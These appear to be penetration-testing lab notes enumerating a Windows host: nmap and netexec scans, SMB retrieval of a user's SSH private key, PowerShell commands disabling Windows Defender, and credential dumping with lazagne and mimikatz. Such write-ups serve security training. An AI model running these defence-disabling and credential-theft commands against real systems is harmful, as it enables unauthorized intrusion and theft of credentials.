5 - Enum 172.16.6.25 (PIVOTWIN10)

# Recon - ping test ![[images/Pasted image 20251024132946.png]] - light nmap scan ![[images/Pasted image 20251024133122.png]] - detailed nmap scan ![[images/Pasted image 20251024133544.png]] ## Netexec Enum - `nxc smb` scan ![[images/Pasted image 20251024133656.png]] - Add in `-d INLANEFREIGHT.LOCAL` ![[images/Pasted image 20251024133927.png]] - `nxc rdp` scan ![[images/Pasted image 20251024133816.png]] ## SMB Enum - Connect with `smbclient` - prepend domain to username: `-U inlanefreight.local/vfrank` ![[images/Pasted image 20251024134408.png]] - id_rsa for vfrank ![[images/Pasted image 20251024134445.png]] - grab, move to loot folder, and rename - Nothing in apendragon, Public, or Default ## RDP Enum - RDP connect ![[images/Pasted image 20251024134956.png]] - Able to open PowerShell as admin - Light enum - All the privs we need ![[images/Pasted image 20251024135152.png]] - I see yet another subnet 172.16.10.0/24 - Run powershell ping sweep script that is an `fping` analogue ![[images/Pasted image 20251024140912.png]] - Found a new host (172.16.10.5) on subnet C ```powershell 1..254 | ForEach-Object { Test-Connection -ComputerName "172.16.10.$_" -Count 1 -Quiet } ``` # Move files to PIVOTWIN10 - RDP drag and drop works ![[images/Pasted image 20251024141033.png]] - Files keep getting deleted by Windows Defender - Because we have admin privs try to uninstall/disable Windows Defender - uninstall didn't work but disable did![[images/Pasted image 20251024140835.png]] ```powershell Uninstall-WindowsFeature -Name Windows-Defender Set-MpPreference -DisableRealtimeMonitoring $true ``` # Lazagne - Run `lazagne.exe` ![[images/Pasted image 20251024141207.png]] - More of the same as lazagne output on PIVOT-SRV01 - No new users - vfrank's privkey leaked, which we already have from SMB enum # Mimikatz - Run `mimikatz.exe` - run `sekurlsa::credman` - New username: vfrank - run `sekrulsa:tickets /export` - run `sekurlsa::logonPasswords` - run `sekurlsa::minidump C:\path\lsass.dmp` - More of the same as mimikatz output on PIVOT-SRV01 - No new users